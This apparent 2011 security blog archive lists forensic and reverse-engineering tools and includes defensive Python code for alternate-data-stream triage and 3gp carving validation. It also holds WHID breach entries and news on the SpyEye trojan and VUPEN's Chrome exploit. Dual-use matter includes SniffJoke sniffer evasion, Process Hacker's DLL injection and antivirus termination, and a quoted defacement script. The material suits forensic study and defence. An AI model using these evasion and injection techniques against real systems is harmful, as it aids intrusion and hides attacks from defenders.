Tuesday, May 31, 2011


CrossPost from Windows Incident Response blog:

Keydet89 has listed a number of forensic and IR and RE tools.

Memory Analysis
There have been a number of changes recently on the memory analysis front.  For example, Mandiant recently released their RedLine tool, and HBGary released the Community Edition of their Responder product. 

While on the topic of memory analysis tools, let's not forget the erstwhile and formidable Volatility.

Also, if you're performing memory dumps from live systems, be sure to take a look at the MoonSol Windows Memory Toolkit.

SQLite Tools
CCL-Forensics has a trial version of epilog available for download, for working with SQLite databases (found on smartphones, etc.).  One of the most noticeable benefits of epilog is that it allows you to recover deleted records, which can be very beneficial for analysts and investigators.

I'm familiar with the SQLite Database Browser...epilog would be interesting to try.

MFT Tools
Sometimes you need a tool to parse the NTFS $MFT file, for a variety of reasons.  A version of my own mft.pl is available online, and Dave Kovar provided his analyzemft.pl tool online, as well.  Mark McKinnon has chimed in and provided MFT parsing tools for Windows, Linux, and MacOSX.

Other Tools
HBGary also made their AcroScrub tool available, which uses WMI to reach across the enterprise and scan for older versions of Adobe Reader.

A very interesting tool that I ran across is Flash Dissector.  If you deal with or even run across SWF files, you might want to take a look at this tool, as well as the companion tools in the SWFRETools set.

The read_open_xml.pl Perl script is still available for parsing metadata from Office 2007 documents.

From the same site as the SWFRETools are some malware write-ups including NiteAim, and Downloader-IstBar.  As a complete aside, here's a very interesting Gh0stNet writeup that Chris pointed me to recently (fans of Ron White refer to him as 'Tater Salad'...fans of Chris Pogue should refer to him as 'Beefcake' or 'Bread Puddin''...).

Alternate data streams isn't something that you see discussed much these days.  I recently received a question about a specific ADS, and thought I'd include some tools in this list.  I've used Frank's LADS, as well as Mark's streams.exe.  Scanning for ADSs is part of my malware detection process checklist, particularly when the goal of the analysis is to determine if there's any malware on the system.

Also, I ran across this listing at MS of Known Alternate Stream Names.  This is some very useful information when processing the output of the above tools, because what often happens is that someone uses one of the above tools and finds one of the listed ADSs, and after the panic that ensues, their attitude switches back to the other side of the spectrum, to apathy...and that's when they're most likely to get hit.

Here are some additional resources from Symantec, IronGeek, and MS. Also, be sure to check out what I've written about these in WFA 2/e.
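One way to act on that advice, as an added example that is not code from LADS, streams.exe or any other tool named above: parse streams.exe-style output, compare each stream name against a partial list of the known names from the Microsoft article, and sort the findings into expected / review / investigate, so that a hit on a known name is neither a reason to panic nor a reason to stop looking at the rest. The output shape, the known-names list (reproduced from memory; check it against the Microsoft article) and the sample listing are assumptions or constructed.

```python
import re

# Partial list of stream names that Windows components create legitimately, reproduced
# from memory after the Microsoft "Known Alternate Stream Names" article referenced
# above: check each entry against that article before relying on it.
KNOWN_STREAMS = {
    "zone.identifier": "Attachment Execution Service mark-of-the-web",
    "encryptable": "Explorer marker on Thumbs.db",
    "favicon": "Internet Explorer favorite icon (.url files)",
    "afp_afpinfo": "Services for Macintosh file information",
    "afp_resource": "Services for Macintosh resource fork",
    "oecustomproperty": "Outlook Express custom property",
    "{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}": "Explorer thumbnail/property stream",
}
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".ps1")

# Assumed shape of streams.exe output: an unindented file path ending in ':', followed by
# one indented line per stream, ':<name>:$DATA' then whitespace and the size in bytes.
STREAM_LINE = re.compile(r"^\s+:(?P<name>[^:]+):\$DATA\s+(?P<size>\d+)\s*$")


def parse_streams_output(text):
    """Return (file path, stream name, size) tuples from streams.exe-style output."""
    entries, current_file = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = STREAM_LINE.match(line)
        if m and current_file is not None:
            entries.append((current_file, m["name"], int(m["size"])))
        elif not line[0].isspace() and line.rstrip().endswith(":"):
            current_file = line.rstrip()[:-1]
    return entries


def triage_stream(name, size, zone_id_max=1024):
    """Classify one stream as 'expected', 'review' or 'investigate', with the reason."""
    key = name.lower()
    if key.endswith(EXECUTABLE_SUFFIXES):
        return "investigate", "stream name looks like an executable parked behind a file"
    if key not in KNOWN_STREAMS:
        return "investigate", "stream name is not on the known-names list"
    if key == "zone.identifier" and size > zone_id_max:
        return "review", "Zone.Identifier is normally a few dozen bytes, this one is %d" % size
    return "expected", KNOWN_STREAMS[key]


def triage_report(text):
    """(path, stream, size, verdict, reason) for every stream in the listing."""
    return [(path, name, size) + triage_stream(name, size)
            for path, name, size in parse_streams_output(text)]


# Constructed listing in the assumed streams.exe format; the paths and sizes are made up.
SAMPLE_OUTPUT = """\
c:\\users\\lab\\downloads\\setup.exe:
   :Zone.Identifier:$DATA\t26
c:\\users\\lab\\documents\\report.docx:
   :Zone.Identifier:$DATA\t4096
c:\\users\\lab\\favorites\\bank.url:
   :favicon:$DATA\t1150
c:\\windows\\temp\\readme.txt:
   :update.exe:$DATA\t73728
c:\\users\\lab\\pictures\\Thumbs.db:
   :encryptable:$DATA\t0
"""

if __name__ == "__main__":
    for path, name, size, verdict, reason in triage_report(SAMPLE_OUTPUT):
        print("%-11s %s:%s (%d bytes) - %s" % (verdict.upper(), path, name, size, reason))
```

The "review" bucket exists because a legitimate name is not proof of legitimate content: Zone.Identifier is a few lines of INI text, so a 4 KB one deserves a look even though the name is on the list.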


Microsoft recently released their Safety Scanner, which is a one-shot micro-scanner...download it, run it, and it expires after 10 days, and then you have to download it again.  This shouldn't replace the use of Security Essentials or other AV tools, but I'm pointing this out because it could be very useful when included as part of your malware detection process.  For example, you could mount an acquired image via FTK Imager or ImDisk and scan the image.  Also, the folks at ForensicArtifacts recently posted on accessing VSCs (their first research link actually goes back to my post by the same title...thanks to AntiForensics for reposting the entire thing...)...without having to have EnCase or PDE, you could easily scan the mounted VSC, as well.

The Digital Forensics Framework (DFF) is open source, and was recently updated to include support for the AFF format, as well as mailbox reconstruction via Joachim Metz's libpff.

Christopher Brown, of TechPathways, has made ProDiscover Basic Edition v6.10.0.2 available, as well.  As a side note, Chris recently tweeted that he's just finished the beta of the full version of ProDiscover, adding the ability to image and diff VSCs.  Wowzers!

TZWorks - free "prototypes" tools, including the Windows Shellbags parser, an EVTX file parser, and others.  Definitely worth checking out.

WoanWare - several free forensics tools including a couple for browser forensics, and (like TZWorks) a 'USBStor parser'.

NirSoft - the link to the site goes to the forensics tools, but there are a lot of free tools available at the NirSoft site...too many to list.

The Open Source Digital Forensics site is a good source of tools, as well.

Speaking of tools, let's not forget that the OSDFC is right around the corner...

Check out Phil Harvey's EXIFTool (comes with a standalone Windows EXE)...there's a long list of supported file types at the tool page.

Additional lists of tools include Mike's Forensic Tools, as well as the tools at MiTeC (thanks to Anonymous' comment).  Also, Mark McKinnon has posted some freely available tools, as well.

Salvaging Digital Video Fragments


Digital video is becoming a more common form of digital evidence with the increasing prevalence of video in computers, mobile devices and cameras. Digital cameras can create high quality videos, most smart phones can create videos, and the iPad2 has two cameras that can create videos. The videos created by such digital devices can be stored on removable storage media and on the devices themselves. Frequent creation and deletion of videos on these kinds of devices can result in fragments of deleted video clips that most file carving tools cannot salvage. In addition, when dealing with Flash memory dumps acquired from mobile devices, data at the physical level is often fragmented. Specialized methods and tools are needed to salvage deleted video fragments as demonstrated in this article using the contents of Flash memory acquired from a Motorola V3 (RAZR) mobile device.

File Carving Limitations

Most file carving tools require a known file header in order to salvage deleted data. For instance, to recover a deleted 3gp file, most carving tools look for the file headers such as the following.

Hex view of 3gp header in the Motorola V3 Flash memory dump

If the file is fragmented or the header is missing, the file carving approach will not salvage the deleted video successfully. In this example, a file carving tool that searched the Motorola V3 memory dump for several 3gp header signatures found two files, as shown in the audit log:

    05/24/2011, 11:26:35
    QuickTime 3GP (3gp), header: ftypisom
    QuickTime 3GP (3gp), header: ftyp3gp
    QuickTime 3GP (3gp), header: ftypmmp4
    Default file size: 1024 KB
    Maximum file size: 100 times (individual file type definition defaults sizes respected)

    E:\Physical GSM Motorola V3 RAZR\Flex Partition 1140000-1fe0000.bin
    Scope: 000000 - E9FFFF
    Extensive byte-level search

    9D0E80 - AD0E7F: 00001.3gp
    B888F0 - C888EF: 00002.3gp

    05/24/2011, 11:26:35
    2 file headers were found. 2 files were retrieved.

However, the salvaged files were invalid because the original files were fragmented. Furthermore, the names and directory paths of these files were not obtained using this method, demonstrating a further limitation of file carving.

Salvaging Video Fragments

When video files are fragmented, it is necessary to consider the video file format in more detail. Fortunately, many digital video formats have a structure that can be used to find and salvage individual frames. A frame is a discrete section of the video that can have a timecode or sequence number and other characteristics that can be useful for salvaging digital video clips.

The defraser tool can be used to identify frames for several video formats in a forensic duplicate of any piece of storage media, including a removable storage card, computer hard drive and Flash dump from a mobile device. The following screenshot shows defraser used to detect video related data in the Motorola V3 memory dump.

Defraser showing video related data in the Motorola V3 memory dump

Although the defraser tool does not automatically piece together the frames into a video that can be played, it does make the frames available for manual reconstruction. With some effort, defraser may be used to combine fragmented frames into a valid video file that can be played.

As with file carving methods that rely on header signatures, the carving methods employed by defraser do not provide the filenames and directory path of salvaged video data in the context of the original file system.

File System Reconstruction

Ultimately, the most effective approach to extracting digital video files from acquired digital evidence such as a Flash memory dump from a mobile device is to reconstruct the logical arrangement of data. On mobile devices, this logical structure involves the flash abstraction layer and the file system. Using mobile device forensic tools such as Cellebrite Physical and XRY, it is possible to reconstruct and review the logical file structure of a Flash memory dump, as shown below with a 3gp video stored in an MMS related file in the Motorola V3 memory dump. Note that different tools may interpret the logical structure differently and show more files and folders, clearly demonstrating the importance of validating the results of forensic examination tools.

XRY/XACT showing the logical file system in the Motorola V3 memory dump

Cellebrite Physical showing the logical file system in the Motorola V3 memory dump

Extracting the MMS file using such a mobile device forensic tool and extracting the video content as discussed in the “Delving into Mobile Device File Systems” blog post results in a 3gp file that can be played using VLC media player.

Playing salvaged digital video using VLC Player

Examination of Salvaged Video

After salvaging digital video files it is important to review the resulting data closely for potential anomalies. For instance, using MediaInfo to extract metadata from video files shows details related to its creation and format. The following screenshot shows metadata from a 3gp video extracted from the Motorola V3 memory dump, revealing that the embedded date-time stamp was set to an incorrect date.

Metadata within a 3gp video displayed using MediaInfo
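Both the carving limitation described earlier (a carver keyed on the ftyp signature happily emits an invalid file when fragmentation breaks the box chain) and the metadata review here (an embedded creation time that turns out to be wrong) can be checked programmatically before a salvaged file is trusted. The following Python is an added example, not code from the article or from any tool it names (defraser, MediaInfo, XRY, Cellebrite). It constructs a small in-memory dump containing one intact and one fragmented 3gp-style box chain, walks the ISO base media box structure from each ftyp hit, reports where the chain stops, and pulls the mvhd creation time so an implausible timestamp is flagged. The examination date and the plausibility window are assumptions, and the sample bytes are constructed, not taken from the Motorola V3 image.

```python
import struct
from datetime import datetime, timedelta, timezone

# ISO base media files (MP4/3GP) count timestamps as seconds since 1904-01-01 UTC.
MP4_EPOCH = datetime(1904, 1, 1, tzinfo=timezone.utc)
# Plausibility window for embedded timestamps: assumed examination date, not from the article.
EARLIEST_PLAUSIBLE = datetime(2000, 1, 1, tzinfo=timezone.utc)
EXAMINATION_TIME = datetime(2011, 6, 1, tzinfo=timezone.utc)


def find_ftyp_candidates(data):
    """Offsets of every possible 'ftyp' box (the 4-byte size field precedes the type)."""
    offsets, pos = [], data.find(b"ftyp")
    while pos != -1:
        if pos >= 4:
            offsets.append(pos - 4)
        pos = data.find(b"ftyp", pos + 4)
    return offsets


def walk_boxes(data, start, end=None):
    """Walk consecutive boxes in data[start:end]. Returns (boxes, stop_offset): boxes is a list
    of (offset, size, type); stop_offset is None if the chain ran cleanly to `end`, otherwise
    the offset of the first implausible header (or of another file's ftyp)."""
    end = len(data) if end is None else end
    boxes, pos = [], start
    while pos < end:
        if pos + 8 > end:
            return boxes, pos
        size, btype = struct.unpack(">I4s", data[pos:pos + 8])
        if size == 1 and pos + 16 <= end:          # 64-bit "largesize" form
            size = struct.unpack(">Q", data[pos + 8:pos + 16])[0]
        elif size == 0:                             # box runs to the end of the region
            size = end - pos
        if btype == b"ftyp" and boxes:              # ran into the next file's header
            return boxes, pos
        if size < 8 or pos + size > end or not all(0x20 <= c < 0x7F for c in btype):
            return boxes, pos
        boxes.append((pos, size, btype.decode("ascii")))
        pos += size
    return boxes, None


def movie_creation_time(data, moov_offset, moov_size):
    """Creation time from the mvhd child of a moov box as a UTC datetime, or None."""
    children, _ = walk_boxes(data, moov_offset + 8, moov_offset + moov_size)
    for off, _size, btype in children:
        if btype == "mvhd":
            version = data[off + 8]                 # payload follows the 8-byte box header
            fmt, width = (">Q", 8) if version == 1 else (">I", 4)
            secs = struct.unpack(fmt, data[off + 12:off + 12 + width])[0]
            return MP4_EPOCH + timedelta(seconds=secs)
    return None


def analyze_candidate(data, start, now=EXAMINATION_TIME):
    """Validate one ftyp hit the way a carver should before calling it a recovered file."""
    boxes, stop = walk_boxes(data, start)
    types = [t for _, _, t in boxes]
    report = {"offset": start, "boxes": types, "stop_offset": stop, "creation_time": None,
              "complete": {"ftyp", "moov", "mdat"} <= set(types), "anomalies": []}
    if not report["complete"]:
        report["anomalies"].append("box chain stops before ftyp, moov and mdat were all seen "
                                   "(fragmented or partly overwritten)")
    for off, size, btype in boxes:
        if btype == "moov":
            ct = movie_creation_time(data, off, size)
            report["creation_time"] = ct
            if ct is not None and not (EARLIEST_PLAUSIBLE <= ct <= now):
                report["anomalies"].append("implausible mvhd creation time " + ct.isoformat())
    return report


def carve_report(data, now=EXAMINATION_TIME):
    return [analyze_candidate(data, off, now) for off in find_ftyp_candidates(data)]


# --- constructed sample dump (not data from the Motorola V3 image in the article) ---
def box(btype, payload):
    return struct.pack(">I4s", 8 + len(payload), btype) + payload

def mvhd_payload(creation_secs):
    # version-0 mvhd: version/flags, creation, modification, timescale, duration, 80 zeroed bytes
    return struct.pack(">BBBBIIII", 0, 0, 0, 0, creation_secs, creation_secs, 1000, 5000) + b"\x00" * 80

GOOD_TIME = int((datetime(2011, 5, 24, 12, 0, tzinfo=timezone.utc) - MP4_EPOCH).total_seconds())
FTYP = box(b"ftyp", b"3gp4" + b"\x00" * 4 + b"3gp4isom")
INTACT = (b"\xff" * 16 + FTYP + box(b"moov", box(b"mvhd", mvhd_payload(GOOD_TIME)))
          + box(b"mdat", bytes(range(64))) + b"\xff" * 8)
FRAGMENTED = (FTYP + box(b"moov", box(b"mvhd", mvhd_payload(0)))       # creation time 1904-01-01
              + b"\x00\x00\x00\x20" + b"\xd8\xff\xe0\x00" * 7            # foreign data where mdat should be
              + box(b"mdat", bytes(range(64))))
SAMPLE_DUMP = INTACT + FRAGMENTED

if __name__ == "__main__":
    for r in carve_report(SAMPLE_DUMP):
        print(hex(r["offset"]), r["boxes"], "complete" if r["complete"] else "INCOMPLETE", r["anomalies"])
```

Run against the constructed dump, the first ftyp hit walks ftyp, moov and mdat and carries a 2011 creation time, so it passes; the second hit stops at the foreign bytes sitting where mdat should be and carries a 1904 creation time, which is exactly the kind of salvaged file that plays badly or not at all and whose metadata should not be reported as-is.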

In addition, reviewing individual frames within a salvaged video file can reveal anomalies such as portions of two unrelated videos being combined into one salvaged file. The following screenshot shows frames extracted from a 3gp file using DCCI Video Validator, revealing footage from two unrelated video files.

Frames extracted from digital video using DCCI Video Validator


When a video file is fragmented or the header of a video file is overwritten, carving methods that rely on header signatures and contiguous files will not salvage video files successfully and may even incorrectly combine unrelated video fragments into a single file or fail to detect the presence of video content altogether. However, using specialized tools such as defraser, a digital investigator may be able to salvage fragments of video files and piece them together into a valid video file. This process of reconstructing video fragments is time consuming and error prone, particularly when dealing with numerous video files on a single piece of storage media or mobile device. Therefore, whenever feasible, it is preferable to reconstruct the logical arrangement of data to extract the complete content of video files. Whichever method is most effective for salvaging digital video, it is important to examine the results closely to ensure the accuracy and completeness of the resulting videos. Such a review includes inspecting embedded metadata for anomalies and reviewing keyframes for possible fragments of unrelated video footage.



If you are serious about scrambling your internet traffic, SniffJoke is for you. It is a Linux application that transparently modifies your TCP sessions, delaying, scrambling and injecting fake traffic, effectively making it impossible or very difficult for anyone running a sniffer on your network to figure out what is actually happening.

How Does It Work?

It works only under Linux (at the moment). It creates a fake default gateway in your OS (on the client or on the real default gateway) using a TUN interface, inspects all traffic passing through it, tracks every session and applies two concepts: the scramble and the hack.

The scramble is the technique that causes either:

  1. A sniffer to accept as genuine a packet that will be discarded by the server, or
  2. A sniffer to drop a packet that will be accepted by the server.

The scramble technology brings in de-synchronization between the sniffer flow and the real flow.

The bogus packet accepted by the sniffer is generated by a "plugin", a simple C++ class which, using pseudo-stateful tracking, forges the packet to be injected into the flow. It is pretty easy to develop a new one, and anyone who wants to research attacks on sniffers (or fuzz the flow looking for bugs) needs to get their hands into it.

The configuration lets you define a blacklist/whitelist of IP addresses to scramble, a degree of aggressiveness for each port, and which plugin will be used.

You can download SniffJoke here:


Saturday, May 21, 2011

Lock Down Your Computer Like the NSA


Want to secure your computer with the same techniques used by the National Security Agency? Turns out the NSA has published guides for securing Windows, Mac, Linux, and Solaris operating systems using methods that 'are currently being used throughout the government and by numerous entities as a security baseline for their systems.'

Friday, May 13, 2011

Tool Updated: Process Hacker

Process Hacker is a feature-packed tool for manipulating processes and services on your computer.

Key features of Process Hacker:
- A simple, customizable tree view with highlighting showing you the processes running on your computer.

- Detailed performance graphs.

- A complete list of services and full control over them (start, stop, pause, resume and delete).

- A list of network connections.

- Comprehensive information for all processes: full process performance history, thread listing and stacks with dbghelp symbols, token information, module and mapped file information, virtual memory map, environment variables, handles, ...

- Full control over all processes, even processes protected by rootkits or security software. Its kernel-mode driver has unique abilities which allows it to terminate, suspend and resume all processes and threads, including software like IceSword, avast! anti-virus, AVG Antivirus, COMODO Internet Security, etc. (just to name a few).

- Find hidden processes and terminate them. Process Hacker detects processes hidden by simple rootkits such as Hacker Defender and FU.

- Easy DLL injection and unloading - simply right-click a process and select "Inject DLL" to inject and right-click a module and select "Unload" to unload!

- Many more features...

Wednesday, May 11, 2011

Mac memory reader

Free Tools for Mac and IOS Forensics

Scalpel 2.0 is here with lots of new features

Scalpel file carver, version 2.0, is the first public release in almost five years. There are a slew of performance enhancements and new features, focusing on improved carving accuracy and performance, and even more goodness is on the

Just some of the new features include:

  • Support for TRE-based regular expressions for headers and footers
  • Support for minimum carve sizes for recovered files
  • Parallel architecture to take full advantage of multicore processors
  • Beta support for NVIDIA CUDA-based GPU acceleration of header / footer searches
  • An asynchronous IO architecture for significantly faster IO throughput
  • Support for 32 and 64-bit Linux, Windows XP, Vista and 7, and OSX

In the coming weeks will post some ways to put these new features to
good use, as well as for the introduction of some even newer

The new version can be downloaded from: http://www.digitalforensicssolutions.com/Scalpel/
The download file contains pre-compiled Windows binaries as well as the project
source code.  If you find any bugs while using Scalpel please send an
email to scalpel at digitalforensicssolutions dot com. If you want to send
comments to the authors, you can contact Golden Richard
(golden@cs.uno.edu / @nolaforensix ) or Lodovico Marziale ( vico@digdeeply.com / http://www.linkedin.com/in/lodovicomarziale ).
If you are interested in the GPU research that went into this project, read the published paper at DFRWS that discusses both the CUDA architecture as well as
the integration of it into Scalpel. It can be found here

Latest Web Hacking Incident Database (WHID) Entries

These are the latest entries added by SpiderLabs to the Web Application Security Consortium (WASC) Web Hacking Incident Database (WHID) Project.

WHID 2011-84: Hackers access personal info of Lancaster County students

Entry Title: WHID 2011-84: Hackers access personal info of Lancaster County students
WHID ID: 2011-84
Date Occurred: April 20, 2011
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: South Carolina
Incident Description: LANCASTER, S.C. -- The Lancaster County School District says hackers may have stolen the personal information of 25,000 students in the district's database.
Schools officials are now trying to contact everyone who might have been affected. Information stored in the database goes back 10 years.
Mass Attack: No
Reference: http://www.wcnc.com/news/local/Personal-Information-of-Thousands-exposed-to-Internet-Hackers-120316064.html
Attack Source Geography:
Number of Records: 25,000

WHID 2011-83: Minn. man accused of hacking Facebook accounts

Entry Title: WHID 2011-83: Minn. man accused of hacking Facebook accounts
WHID ID: 2011-83
Date Occurred: April 21, 2011
Attack Method: Social Engineering
Application Weakness: Insufficient Password Recovery
Outcome: Account Takeover
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description: Prosecutors have accused a Minnesota man of hacking into other people's Facebook and other computer accounts and stealing photos of women to post on adult websites.
Prosecutors charged Timothy Peter Noirjean, 26, of Woodbury, with 13 counts of identity theft, alleging that from February 2010 through March 2010 he contacted women online and duped them into providing him with personal information that allowed him to hack their Facebook and other accounts. After hacking a Facebook account, prosecutors say Noirjean would pose as the owner to make contact with that person's friends and try to gain access to more computer accounts.
Read more: http://www.foxnews.com/us/2011/04/20/minn-man-accused-hacking-facebook-accounts/#ixzz1KBSiqxBX
Mass Attack: No
Reference: http://www.foxnews.com/us/2011/04/20/minn-man-accused-hacking-facebook-accounts/
Attack Source Geography:
Attacked System Technology: Facebook

WHID 2011-82: Sony fears Anonymous hack as PSN stays down

Entry Title: WHID 2011-82: Sony fears Anonymous hack as PSN stays down
WHID ID: 2011-82
Date Occurred: April 21, 2011
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description: It's looking more likely that loose-knit 'hacktivist' collective Anonymous may have pulled off the 'biggest ever' attack on Sony's PlayStation network (PSN), as company engineers are investigating the possibility that the online gaming service has been hacked.
Mass Attack: No
Reference: http://www.thinq.co.uk/2011/4/21/sony-fears-anonymous-hack-psn-stays-down/
Attack Source Geography:

WHID 2011-81: AlArabiya.net Hacked…Again

Entry Title: WHID 2011-81: AlArabiya.net Hacked…Again
WHID ID: 2011-81
Date Occurred: April 21, 2011
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: News
Attacked Entity Geography: Saudi Arabia
Incident Description: Being one of the region’s leading news agencies, Al-Arabiya which is part of MBC Group, the largest broadcasting company in the Middle East has been hacked by an unknown group signed only with ‘Crack_Man’ stating it has been ‘powered morocco’.
The hacked website comes in a long lasting tradition of security flaws in the website leading to the recurrent event of the portal being hacked during political instability hits the region usually as an expression of disagreeing with what many consider the news agency’s Western oriented liberal point of view.
Mass Attack: No
Reference: http://thenextweb.com/me/2011/04/21/alarabiya-net-hacked-again/
Attack Source Geography:

WHID 2011-80: Ashampoo server hacked, customer names and e-mail addresses stolen

Entry Title: WHID 2011-80: Ashampoo server hacked, customer names and e-mail addresses stolen
WHID ID: 2011-80
Date Occurred: April 21, 2011
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: Rolf Hilchner, CEO of Ashampoo, has posted on the company’s website explaining exactly what has happened. Apparently hackers managed to break into one of Ashampoo’s servers that held customer data. There was a hole in their security and by using it Ashampoo customer names and e-mail addresses have been taken, but no payment and billing information was accessed.
Mass Attack: No
Reference: http://www.geek.com/articles/geek-pick/ashampoo-server-hacked-customer-names-and-e-mail-addresses-stolen-20110421/
Attack Source Geography:
Additional Link: http://www.ashampoo.com/en/usd/dth

WHID 2011-79: Change.org Victim of DDoS Attack From China

Entry Title: WHID 2011-79: Change.org Victim of DDoS Attack From China
WHID ID: 2011-79
Date Occurred: April 19, 2011
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Politics
Attacked Entity Geography:
Incident Description: Change.org, an online petitioning platform, has come under an ongoing distributed denial of service (DDoS) attack originating from China after the site hosted a call urging Chinese authorities to release artist Ai Weiwei from custody.
Mass Attack: No
Reference: http://www.pcworld.com/printable/article/id,225672/printable.html
Attack Source Geography: China

WHID 2011-78: The Children's Place, popular kid's clothing retailer, hit with database breach

Entry Title: WHID 2011-78: The Children's Place, popular kid's clothing retailer, hit with database breach
WHID ID: 2011-78
Date Occurred: April 19, 2011
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Phishing
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: The Children's Place Retail Stores Inc. said Tuesday that its customer email address database was recently accessed by an unauthorized third party. The database is stored at an external email service provider, according to company officials. The external service provider confirmed that only email addresses were accessed and no other personal information was obtained.
Mass Attack: No
Reference: http://www.csoonline.com/article/679983/the-children-s-place-popular-kid-s-clothing-retailer-hit-with-database-breach
Attack Source Geography:

WHID 2011-77: Scottish news site hit by 'DDoS attack' in run-up to elections

Entry Title: WHID 2011-77: Scottish news site hit by 'DDoS attack' in run-up to elections
WHID ID: 2011-77
Date Occurred: April 19, 2011
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: Scotland
Incident Description: Politically-motivated hackers are thought to be behind a DDoS attack on alternative news site Newsnet Scotland, launched on Monday days before Scotland is due to vote in fiercely contested local elections.
The attack, if that's what it is, left the site unavailable from Monday afternoon into the early hours of Tuesday morning.
Mass Attack: No
Reference: http://www.theregister.co.uk/2011/04/19/scottish_news_site_ddos/
Attack Source Geography:

WHID 2011-76: Auto Trader website attacked

Entry Title: WHID 2011-76: Auto Trader website attacked
WHID ID: 2011-76
Date Occurred: April 19, 2011
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Automotive
Attacked Entity Geography: USA
Incident Description: According to a story released on the Auto Trader blog page, the Auto Trader website was subject to an attack from midday on April 19th until the early hours of April 20th.
The attack disrupted access to the site, causing it to run slowly or not open at all. According to the blog the attack originated from abroad. Such attacks, called denial of service, or DDOS attacks, are desig
Mass Attack: No
Reference: http://www.honestjohn.co.uk/news/buying-and-selling/2011-04/auto-trader-website-attacked/
Attack Source Geography:

WHID 2011-75: Manila Water's website hacked

Entry Title: WHID 2011-75: Manila Water's website hacked
WHID ID: 2011-75
Date Occurred: April 17, 2011
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Energy
Attacked Entity Geography: Manila, Philippines
Incident Description: The website of water concessionaire Manila Water was hacked early Sunday, with visitors to the site seeing a small window indicating the breach.

WHID Analysis - looking at the html in the pages, it appears as though sql injection was the attack vector -

<script type="text/javascript">
function show_alert(){
alert("hacked! pakifix po yung blind sql po sa server nyo :D");}
</script>

Mass Attack: No
Reference: http://www.gmanews.tv/story/218014/nation/manila-waters-website-hacked
Attack Source Geography:

WHID 2011-74: Wind Power Company Hacked

Entry Title: WHID 2011-74: Wind Power Company Hacked
WHID ID: 2011-74
Date Occurred: April 18, 2011
Attack Method: Brute Force
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: SCADA
Attacked Entity Geography: New Mexico, USA
Incident Description: In an email interview with the IDG News Service, Bigr R, said he was a former employee of NextEra's parent company, Florida Power & Light. He said he used a bug in the Cisco Security Device Manager software used by NextEra to break into the site. "They gave to it public IP, so it was easy to hack into it through the Web," he said. "They used default passwords, which I got from one of administrators. Then I obtained level 15 priv. (superuser), and understood the topology of SCADA networks. Then it was easily to detect SCADA and turn it off."
Mass Attack: No
Reference: http://www.computerworld.com/s/article/9215881/Wind_power_company_sees_no_evidence_of_reported_hack
Attack Source Geography:

WHID 2011-73: Royal Navy hacker claims to have broken into space agency site

Entry Title: WHID 2011-73: Royal Navy hacker claims to have broken into space agency site
WHID ID: 2011-73
Date Occurred: April 18, 2011
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography:
Incident Description: Login credentials for database, email and other key systems that a poster claims belong to the European Space Agency were posted on a full disclosure mailing list over the weekend.
Mass Attack: No
Reference: http://www.eweekeurope.co.uk/news/european-space-agency-confirms-ftp-server-hack-26976
Attack Source Geography:

SpyEye Targets Opera, Google Chrome Users

The latest version of the SpyEye trojan includes new capability specifically designed to steal sensitive data from Windows users surfing the Internet with the Google Chrome and Opera Web browsers.

The author of the SpyEye trojan formerly sold the crimeware-building kit on a number of online cybercrime forums, but has recently limited his showroom displays to a handful of highly vetted underground communities. KrebsOnSecurity.com recently chatted with a member of one of these communities who has purchased a new version of SpyEye. Screenshots from the package show that the latest rendition comes with the option for new “form grabbing” capabilities targeting Chrome and Opera users.

SpyEye component in version 1.3.34 shows form grabbing options for Chrome and Opera

Trojans like ZeuS and SpyEye have the built-in ability to keep logs of every keystroke a victim types on his or her keyboard, but this kind of tracking usually creates too much extraneous data for the attackers, who mainly are interested in financial information such as credit card numbers and online banking credentials. Form grabbers accomplish this by stripping out any data that victims enter in specific Web site form fields, snarfing and recording that data before it can be encrypted and sent to the Web site requesting the information.

Both SpyEye and ZeuS have had the capability to do form grabbing against Internet Explorer and Firefox for some time, but this is the first time I’ve seen any major banking trojans claim the ability to target Chrome and Opera users with this feature.

Aviv Raff, CTO and co-founder of security alert service Seculert, said that both SpyEye and ZeuS work by “hooking” the “dynamic link library” or DLL files used by IE and Firefox. However, Chrome and Opera appear to use different DLLs, Raff said.

This strikes me as an incremental yet noteworthy development. Many people feel more secure using browsers like Chrome and Opera because they believe the browsers’ smaller market share makes them less of a target for cyber crooks. This latest SpyEye innovation is a good reminder that computer crooks are constantly looking for new ways to better monetize the resources they’ve already stolen. Security-by-obscurity is no substitute for good security practices and common sense: If you’ve installed a program, update it regularly; if you didn’t go looking for a program, add-on or download, don’t install it; if you no longer need a program, remove it.

Tuesday, May 10, 2011

VUPEN pwns Chrome

VUPEN Security claims to have pwned Google Chrome and has released a video purporting to show it. This affects Chrome version 11.0.696.65 on Win7 SP1 64-bit. The code that VUPEN came up with bypasses ASLR, DEP and the sandbox. It is also silent, in that the browser does not crash after executing the payload. VUPEN claims it works on all Windows systems (x86 and x64). Chrome has survived the PWN2OWN contest for the past 3 years in a row.

Security, VUPEN style, means VUPEN does not disclose this vuln to Google. It will, however, provide it to its clients and customers, enabling them to protect themselves. This in effect means that Google may not have any way of verifying these claims anytime soon.

